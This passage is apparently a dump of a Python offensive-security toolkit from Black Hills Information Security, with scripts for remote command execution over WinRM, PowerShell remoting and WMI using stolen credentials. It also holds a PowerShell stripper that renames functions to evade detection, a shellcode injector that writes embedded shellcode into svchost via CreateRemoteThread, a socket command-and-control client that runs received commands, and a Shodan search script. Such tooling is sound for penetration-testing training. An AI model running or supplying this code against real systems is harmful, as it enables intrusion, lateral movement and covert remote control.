headers=custom_headers, data=payload)\r\n\tif response.status_code == 200:\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\r\nif __name__ == '__main__':\r\n\turl = sys.argv[1]\r\n\tuser_file = sys.argv[2]\r\n\tpassword_file = sys.argv[3]\r\n\tmain(url, user_file, password_file)\r\n" }, { "path": "pivot_psremoting.py", "content": "from pypsrp.powershell import PowerShell, RunspacePool\r\nfrom pypsrp.wsman import WSMan\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(host, username, password, command):\r\n\twsman = WSMan(host, username=username,\r\n\t\t\t\t password=password,\r\n\t\t\t\t cert_validation=False)\r\n\r\n\twith RunspacePool(wsman) as pool:\r\n\t\tps = PowerShell(pool)\r\n\t\tps.add_cmdlet(command)\r\n\t\tps.invoke()\r\n\r\n\t\tprint(ps.output[0])\r\n\r\nif __name__ == '__main__':\r\n\thost = sys.argv[1]\r\n\tusername = sys.argv[2]\r\n\tpassword = sys.argv[3]\r\n\tcommand = sys.argv[4]\r\n\r\n\tmain(host, username, password, command)" }, { "path": "pivot_winrm.py", "content": "from winrm.protocol import Protocol\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(computer, username, password, command):\r\n\tp = Protocol(\r\n\t\tendpoint='https://{}:5986/wsman'.format(computer),\r\n\t\ttransport='ntlm',\r\n\t\tusername=username,\r\n\t\tpassword=password,\r\n\t\tserver_cert_validation='ignore'\r\n\t)\r\n\r\n\tshell_id = p.open_shell()\r\n\t#command_id = p.run_command(shell_id, 'query', ['user'])\r\n\tcommand_id = p.run_command(shell_id,command, [])\r\n\tstd_out, std_err, status_code = p.get_command_output(shell_id, command_id)\r\n\tp.cleanup_command(shell_id, command_id)\r\n\tp.close_shell(shell_id)\r\n\r\nif __name__ == '__main__':\r\n\tcomputer = sys.argv[1]\r\n\tusername = sys.argv[2]\r\n\tpassword = sys.argv[3]\r\n\tcommand = sys.argv[4]\r\n\r\n\tmain(computer, username, password, command)" }, { "path": "pivot_wmi.py", "content": "from socket import *\r\nimport wmi\r\nimport time\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(host, username, password, command_path):\r\n\tSW_SHOWNORMAL = 1\r\n\r\n\tc = wmi.WMI(host, user=username, password=password)\r\n\tprocess_startup = c.Win32_ProcessStartup.new()\r\n\tprocess_startup.ShowWindow = SW_SHOWNORMAL\r\n\tprocess_id, result = c.Win32_Process.Create(CommandLine=command_path,ProcessStartupInformation=process_startup)\r\n\r\n\tif result == 0:\r\n\t\tprint(\"Execution success: {} pid\".format(process_id))\r\n\telse:\r\n\t\tprint(\"Execution failed: {}\".format(result))\r\n\r\nif __name__ == '__main__':\r\n\thost = sys.argv[1]\r\n\tusername = sys.argv[2]\r\n\tpassword = sys.argv[3]\r\n\tcommand_path = sys.argv[4]\r\n\r\n\tmain(host, username, password, command_path)" }, { "path": "powerstrip.py", "content": "#!/usr/bin/env python3\r\n\r\nimport argparse\r\nimport sys\r\nimport re\r\nimport os\r\n__version__ = '1.0.3'\r\n__author__ = 'Joff Thyer'\r\n\r\n\r\nclass PowerStrip():\r\n\r\n functions = {}\r\n\r\n def __init__(self, filename, stutter=False):\r\n self.filename = filename\r\n self.stutter = stutter\r\n try:\r\n rootname, ext = os.path.basename(filename).split('.')\r\n except Exception as e:\r\n print('{}: ps1 extension?'.format(e))\r\n sys.exit(1)\r\n self.outputfile = '{}-stripped.{}'.format(rootname, ext)\r\n self.run()\r\n\r\n def run(self):\r\n print('[*] Reading Input file: {}'.format(self.filename))\r\n infile = open(self.filename, 'rt')\r\n self.contents = infile.readlines()\r\n infile.close()\r\n self.process_file()\r\n print('[*] Writing Output file: {}'.format(self.outputfile))\r\n outfile = open(self.outputfile, 'wt')\r\n outfile.writelines(self.results)\r\n outfile.close()\r\n\r\n def process_file(self):\r\n self.results = []\r\n skip = False\r\n rxp = re.compile(r'function\\s([A-Za-z]+-[A-Za-z]+)')\r\n for line in self.contents:\r\n if self.stutter:\r\n m = rxp.match(line)\r\n if m:\r\n self.functions[m.group(1)] = True\r\n if '<#' in line:\r\n skip = True\r\n continue\r\n elif '#>' in line:\r\n skip = False\r\n continue\r\n elif re.match(r'^\\s*#.*$', line):\r\n continue\r\n if not skip:\r\n self.results.append(line)\r\n\r\n print('[*] {} lines in original script.'.format(len(self.contents)))\r\n print('[*] {} lines in new script.'.format(len(self.results)))\r\n print('[*] {} total lines removed.'.format(len(self.contents) - len(self.results)))\r\n\r\n if not self.stutter:\r\n return\r\n\r\n print('[*] Detected Function Names:')\r\n out = ''\r\n for f in sorted(self.functions.keys()):\r\n out += '{}, '.format(f)\r\n if len(out) > 60:\r\n print(' [+] {}'.format(out))\r\n out = ''\r\n if len(out) < 60:\r\n print(' [+] {}'.format(out[:-2]))\r\n # fix function names\r\n replaced = 0\r\n for i, line in enumerate(self.results):\r\n for f in self.functions:\r\n if f in line:\r\n self.results[i] = line.replace(f, f[0] + f)\r\n replaced += 1\r\n print('[*] {} total function names detected.'.format(len(self.functions)))\r\n print('[*] {} function name substitutions.'.format(replaced))\r\n\r\nif __name__ == '__main__':\r\n progname = os.path.basename(sys.argv[0]).split('.')[0].title()\r\n banner = '''\\\r\n[*] --------------------------------------------\r\n[*] {}, Version: {}\r\n[*] Author: {}, (c) 2020\r\n[*] --------------------------------------------\r\n'''.format(progname, __version__, __author__)\r\n print(banner)\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('filename')\r\n parser.add_argument(\r\n '-s', '--stutter', default=False, action='store_true',\r\n help='''\\\r\nModify function names by adding additional letter at beginning.\r\n\"Invoke-Fun\" becomes \"IInvoke-Fun\" for example.'''\r\n )\r\n args = parser.parse_args()\r\n ps = PowerStrip(args.filename, args.stutter)" }, { "path": "pyinjector.py", "content": "from __future__ import print_function\r\nimport ctypes\r\nimport ctypes.wintypes as wt\r\nimport psutil\r\nimport random\r\nimport os\r\nimport platform\r\nimport sys\r\ntry:\r\n input = raw_input\r\nexcept:\r\n pass\r\n\r\n\r\nclass InjectProcess():\r\n calc_x86 = \"\"\r\n calc_x86 += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\n calc_x86 += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\n calc_x86 += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\n calc_x86 += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\n calc_x86 += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\n calc_x86 += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\n calc_x86 += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\n calc_x86 += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\n calc_x86 += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\n calc_x86 += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\n calc_x86 += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\r\n calc_x86 += \"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\r\n calc_x86 += \"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\r\n calc_x86 += \"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\r\n calc_x86 += \"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\r\n\r\n calc_x64 = \"\"\r\n calc_x64 += \"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\"\r\n calc_x64 += \"\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\"\r\n calc_x64 += \"\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\"\r\n calc_x64 += \"\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\"\r\n calc_x64 += \"\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\"\r\n calc_x64 += \"\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\"\r\n calc_x64 += \"\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\"\r\n calc_x64 += \"\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\"\r\n calc_x64 += \"\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\"\r\n calc_x64 += \"\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\"\r\n calc_x64 += \"\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\"\r\n calc_x64 += \"\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\"\r\n calc_x64 += \"\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\"\r\n calc_x64 += \"\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\"\r\n calc_x64 += \"\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\"\r\n calc_x64 += \"\\x8b\\x12\\xe9\\x57\\xff\\xff\\xff\\x5d\\x48\\xba\\x01\\x00\\x00\"\r\n calc_x64 += \"\\x00\\x00\\x00\\x00\\x00\\x48\\x8d\\x8d\\x01\\x01\\x00\\x00\\x41\"\r\n calc_x64 += \"\\xba\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x41\"\r\n calc_x64 += \"\\xba\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\"\r\n calc_x64 += \"\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\"\r\n calc_x64 += \"\\x00\\x59\\x41\\x89\\xda\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\"\r\n calc_x64 += \"\\x78\\x65\\x00\"\r\n\r\n PROCESS_SOME_ACCESS = 0x000028\r\n MEM_COMMIT = 0x1000\r\n MEM_RESERVE = 0x2000\r\n MEM_COMMIT_RESERVE = 0x3000\r\n\r\n PAGE_READWRITE = 0x04\r\n PAGE_READWRITE_EXECUTE = 0x40\r\n PAGE_READ_EXECUTE = 0x20\r\n\r\n def __init__(self, shellcode=None):\r\n self.kernel32 = ctypes.windll.kernel32\r\n self.kernel32_function_definitions()\r\n domain = os.getenv('USERDOMAIN')\r\n name = os.getenv('USERNAME')\r\n self.username = '{}\\\\{}'.format(domain, name).lower()\r\n if shellcode is None and platform.architecture()[0] == '64bit':\r\n print('[*] Architecture is 64-bit.')\r\n self.shellcode = self.calc_x64\r\n else:\r\n print('[*] Architecture is 32-bit.')\r\n self.shellcode = self.calc_x86\r\n\r\n menu = \"\"\"\r\n____________________________________________________________________\r\n\r\n Python Proof of Concept Shellcode Injection Techniques\r\n Author: Joff Thyer (c) 2020, Black Hills Information Security\r\n\r\n 1. Inject Shellcode using VirtualAlloc() within Python process.\r\n 2. Inject Shellcode using a created Heap within Python process.\r\n 3. Find a process that the user owns, and use CreateRemoteThread().\r\n\r\n 9. Exit Program\r\n_____________________________________________________________________\r\n\r\n \"\"\"\r\n\r\n done = False\r\n while not done:\r\n print(menu)\r\n try:\r\n s = int(input(\" Enter your selection: \"))\r\n except:\r\n continue\r\n if s == 1:\r\n self.same_process_virtualalloc()\r\n elif s == 2:\r\n self.same_process_heapalloc()\r\n\r\n elif s == 3:\r\n self.inject_process_CreateRemoteThread()\r\n elif s == 9:\r\n done = True\r\n\r\n def kernel32_function_definitions(self):\r\n # Define argument types for Kernel32 functions\r\n\r\n # CloseHandle()\r\n self.CloseHandle = ctypes.windll.kernel32.CloseHandle\r\n self.CloseHandle.argtypes = [wt.HANDLE]\r\n self.CloseHandle.restype = wt.BOOL\r\n\r\n # CreateThread()\r\n self.CreateThread = ctypes.windll.kernel32.CreateThread\r\n self.CreateThread.argtypes = [\r\n wt.LPVOID, ctypes.c_size_t, wt.LPVOID,\r\n wt.LPVOID, wt.DWORD, wt.LPVOID\r\n ]\r\n self.CreateThread.restype = wt.HANDLE\r\n\r\n # CreateRemoteThread()\r\n self.CreateRemoteThread = ctypes.windll.kernel32.CreateRemoteThread\r\n self.CreateRemoteThread.argtypes = [\r\n wt.HANDLE, wt.LPVOID, ctypes.c_size_t,\r\n wt.LPVOID, wt.LPVOID, wt.DWORD, wt.LPVOID\r\n ]\r\n self.CreateRemoteThread.restype = wt.HANDLE\r\n\r\n # HeapAlloc()\r\n self.HeapAlloc = ctypes.windll.kernel32.HeapAlloc\r\n self.HeapAlloc.argtypes = [wt.HANDLE, wt.DWORD, ctypes.c_size_t]\r\n self.HeapAlloc.restype = wt.LPVOID\r\n\r\n # HeapCreate()\r\n self.HeapCreate = ctypes.windll.kernel32.HeapCreate\r\n self.HeapCreate.argtypes = [wt.DWORD, ctypes.c_size_t, ctypes.c_size_t]\r\n self.HeapCreate.restype = wt.HANDLE\r\n\r\n # OpenProcess()\r\n self.OpenProcess = ctypes.windll.kernel32.OpenProcess\r\n self.OpenProcess.argtypes = [wt.DWORD, wt.BOOL, wt.DWORD]\r\n self.OpenProcess.restype = wt.HANDLE\r\n\r\n # RtlMoveMemory()\r\n self.RtlMoveMemory = ctypes.windll.kernel32.RtlMoveMemory\r\n self.RtlMoveMemory.argtypes = [wt.LPVOID, wt.LPVOID, ctypes.c_size_t]\r\n self.RtlMoveMemory.restype = wt.LPVOID\r\n\r\n # VirtualAlloc()\r\n self.VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc\r\n self.VirtualAlloc.argtypes = [\r\n wt.LPVOID, ctypes.c_size_t, wt.DWORD, wt.DWORD\r\n ]\r\n self.VirtualAlloc.restype = wt.LPVOID\r\n\r\n # VirtualAllocEx()\r\n self.VirtualAllocEx = ctypes.windll.kernel32.VirtualAllocEx\r\n self.VirtualAllocEx.argtypes = [\r\n wt.HANDLE, wt.LPVOID, ctypes.c_size_t,\r\n wt.DWORD, wt.DWORD\r\n ]\r\n self.VirtualAllocEx.restype = wt.LPVOID\r\n\r\n # VirtualFreeEx()\r\n self.VirtualFreeEx = ctypes.windll.kernel32.VirtualFreeEx\r\n self.VirtualFreeEx.argtypes = [\r\n wt.HANDLE, wt.LPVOID, ctypes.c_size_t, wt.DWORD\r\n ]\r\n self.VirtualFreeEx.restype = wt.BOOL\r\n\r\n # VirtualProtect()\r\n self.VirtualProtect = ctypes.windll.kernel32.VirtualProtect\r\n self.VirtualProtect.argtypes = [\r\n wt.LPVOID, ctypes.c_size_t, wt.DWORD, wt.LPVOID\r\n ]\r\n self.VirtualProtect.restype = wt.BOOL\r\n\r\n # VirtualProtectEx()\r\n self.VirtualProtectEx = ctypes.windll.kernel32.VirtualProtectEx\r\n self.VirtualProtectEx.argtypes = [\r\n wt.HANDLE, wt.LPVOID, ctypes.c_size_t,\r\n wt.DWORD, wt.LPVOID\r\n ]\r\n self.VirtualProtectEx.restype = wt.BOOL\r\n\r\n # WaitForSingleObject\r\n self.WaitForSingleObject = self.kernel32.WaitForSingleObject\r\n self.WaitForSingleObject.argtypes = [wt.HANDLE, wt.DWORD]\r\n self.WaitForSingleObject.restype = wt.DWORD\r\n\r\n # WriteProcessMemory()\r\n self.WriteProcessMemory = self.kernel32.WriteProcessMemory\r\n self.WriteProcessMemory.argtypes = [\r\n wt.HANDLE, wt.LPVOID, wt.LPCVOID,\r\n ctypes.c_size_t, wt.LPVOID\r\n ]\r\n self.WriteProcessMemory.restype = wt.BOOL\r\n\r\n def select_pid(self):\r\n candidates = {}\r\n for pid in psutil.pids():\r\n p = psutil.Process(pid)\r\n try:\r\n name = p.name()\r\n username = p.username().lower()\r\n except:\r\n continue\r\n if self.username == username and name == 'svchost.exe':\r\n candidates[pid] = name\r\n choice = random.choice(list(candidates.keys()))\r\n print('[*] Selected Process ID: {} ({}) to Inject'.format(\r\n choice, candidates[choice]\r\n ))\r\n return int(choice)\r\n\r\n def same_process_virtualalloc(self):\r\n print(\"\"\"\r\n[*] =============================================\r\n[*] Shellcode Resident in Same Process using\r\n[*] VirtualAlloc()/CreateThread()!\r\n[*] =============================================\"\"\")\r\n memptr = self.VirtualAlloc(\r\n 0, len(self.shellcode),\r\n self.MEM_COMMIT, self.PAGE_READWRITE_EXECUTE\r\n )\r\n print('[*] VirtuallAlloc() Memory at: {:08X}'.format(memptr))\r\n self.RtlMoveMemory(memptr, self.shellcode, len(self.shellcode))\r\n print('[*] Shellcode copied into memory.')\r\n self.VirtualProtect(memptr, len(self.shellcode), self.PAGE_READ_EXECUTE, 0)\r\n print('[*] Changed permissions on memory to READ_EXECUTE only.')\r\n thread = self.CreateThread(0, 0, memptr, 0, 0, 0)\r\n print('[*] CreateThread() in same process.')\r\n self.WaitForSingleObject(thread, 0xFFFFFFFF)\r\n\r\n def same_process_heapalloc(self):\r\n print(\"\"\"\r\n[*] ===========================================\r\n[*] Shellcode Resident in Same Process using \r\n[*] HeapAlloc()/CreateThread()!'\r\n[*] ===========================================\"\"\")\r\n heap = self.HeapCreate(0x00040000, len(self.shellcode), 0)\r\n self.HeapAlloc(heap, 0x00000008, len(self.shellcode))\r\n print('[*] HeapAlloc() Memory at: {:08X}'.format(heap))\r\n self.RtlMoveMemory(heap, self.shellcode, len(self.shellcode))\r\n print('[*] Shellcode copied into memory.')\r\n thread = self.CreateThread(0, 0, heap, 0, 0, 0)\r\n print('[*] CreateThread() in same process.')\r\n self.WaitForSingleObject(thread, 0xFFFFFFFF)\r\n\r\n def inject_process_CreateRemoteThread(self):\r\n print(\"\"\"\r\n[*] =======================================================\r\n[*] Find a process to inject shellcode into using process\r\n[*] listing, then VirtualAllocEx(), WriteProcessMemory(),\r\n[*] CreateRemoteThread()\r\n[*] =======================================================\"\"\")\r\n pid = self.select_pid()\r\n ph = self.kernel32.OpenProcess(self.PROCESS_SOME_ACCESS, False, pid)\r\n print('[*] Process handle is: 0x{:06X}'.format(ph))\r\n if ph == 0:\r\n return\r\n\r\n memptr = self.VirtualAllocEx(\r\n ph, 0, len(self.shellcode),\r\n self.MEM_COMMIT_RESERVE,\r\n self.PAGE_READWRITE\r\n )\r\n print('[*] VirtualAllocEx() memory at: 0x{:08X}'.format(memptr))\r\n if memptr == 0:\r\n return\r\n\r\n nbytes = ctypes.c_int(0)\r\n result = self.WriteProcessMemory(\r\n ph, memptr, self.shellcode,\r\n len(self.shellcode), ctypes.byref(nbytes)\r\n )\r\n print('[+] Bytes written = {}'.format(nbytes.value))\r\n if result == 0:\r\n print(\"[-] WriteProcessMemory() Failed - Error Code: {}\".format(\r\n self.kernel32.GetLastError()\r\n ))\r\n return\r\n\r\n old_protection = ctypes.pointer(wt.DWORD())\r\n result = self.VirtualProtectEx(\r\n ph, memptr, len(self.shellcode),\r\n self.PAGE_READ_EXECUTE, old_protection\r\n )\r\n if result == 0:\r\n print(\"[-] VirtualProtectEx() Failed - Error Code: {}\".format(\r\n self.kernel32.GetLastError()\r\n ))\r\n return\r\n th = self.CreateRemoteThread(ph, None, 0, memptr, None, 0, None)\r\n if th == 0:\r\n print(\"[-] CreateRemoteThread() Failed - Error Code: {}\".format(\r\n self.kernel32.GetLastError()\r\n ))\r\n return\r\n self.VirtualFreeEx(ph, memptr, 0, 0xC000)\r\n self.CloseHandle(ph)\r\n\r\n\r\nif __name__ == '__main__':\r\n InjectProcess()" }, { "path": "pymeta.py", "content": "import os\r\nimport re\r\nimport argparse\r\nimport zipfile\r\nimport PyPDF2\r\nfrom lxml import etree as ET\r\n\r\n\r\nclass PyMetaExtractor():\r\n\r\n ext = ['docx', 'xlsx', 'pptx', 'pdf']\r\n rexp = re.compile(r'.+\\.({})$'.format('|'.join(ext)))\r\n def __init__(self, directory):\r\n self.directory = os.path.abspath(directory)\r\n print(\"[*] Starting to search from: [{}]\".format(self.directory))\r\n return\r\n\r\n def run(self):\r\n for cwd, lod, lof in os.walk(self.directory):\r\n for f in lof:\r\n m = self.rexp.match(f)\r\n if m:\r\n fullpath = os.path.join(cwd, f)\r\n try:\r\n print('[*] {}'.format(fullpath))\r\n if m.group(1) == 'pdf':\r\n self.pdf(fullpath)\r\n else:\r\n self.openxml(fullpath)\r\n print('')\r\n except:\r\n continue\r\n\r\n def openxml(self, pathname):\r\n zf = zipfile.ZipFile(pathname, 'r')\r\n docprops = ET.fromstring(zf.read('docProps/core.xml'))\r\n for meta in docprops.findall('*'):\r\n if meta.tag[0] == '{':\r\n tag = meta.tag.split('}')[1].title()\r\n else:\r\n tag = meta.tag.title()\r\n value = meta.text\r\n print(' [+] {:15s} => {}'.format(tag, value))\r\n\r\n def pdf(self, pathname):\r\n reader = PyPDF2.PdfFileReader(pathname)\r\n meta = reader.getDocumentInfo()\r\n for key in meta:\r\n tag = key.lstrip('/')\r\n value = meta[key]\r\n print(' [+] {:15s} => {}'.format(tag, value))\r\n\r\nif __name__ == '__main__':\r\n print('''\r\n_______________________________________\r\n\r\n PyMeta version 1.0\r\n Author: Joff Thyer (c) 2020\r\n Black Hills Information Security\r\n_______________________________________\r\n''')\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('directory', help='starting directory')\r\n args = parser.parse_args()\r\n pm = PyMetaExtractor(args.directory)\r\n pm.run()" }, { "path": "requirements.txt", "content": "pywinrm\r\npypsrp\r\nwmi\r\nboto3\r\nazure\r\noauth2client\r\nlxml\r\nPyPDF2\r\nrequests\r\nrequestium\r\nselenium\r\nbs4\r\nscapy\r\nshodan\r\n" }, { "path": "shodan_search.py", "content": "from shodan import Shodan\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(api_key, search):\r\n\tapi = Shodan(api_key)\r\n\r\n\tfor result in api.search_cursor(search):\r\n\t\tprint(result['hostnames'])\r\n\r\nif __name__ == '__main__':\r\n\tapi_key = sys.argv[1]\r\n\tsearch = sys.argv[2]\r\n\t\r\n\tmain(api_key, search)\r\n" }, { "path": "socket_c2_client.py", "content": "import socket\r\nimport subprocess\r\nimport sys\r\nimport time\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main():\r\n\tc2_server = '127.0.0.1'\r\n\tc2_port = 777\r\n\r\n\twith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\r\n\t\tsock.connect((c2_server, c2_port))\r\n\t\tlisten_commands(sock)\r\n\r\ndef listen_commands(sock):\r\n\tsock.sendall('check-in'.encode('utf-8'))\r\n\twhile True:\r\n\t\tcommand = sock.recv(1024).decode('utf-8')\r\n\t\tprint(f'Received command from server: {command}')\r\n\t\tif command == 'die':\r\n\t\t\tsys.exit(1)\r\n\t\tcommand_results = subprocess.getoutput(command)\r\n\t\tsock.sendall(command_results.encode('utf-8'))\r\n\r\nif __name__ == 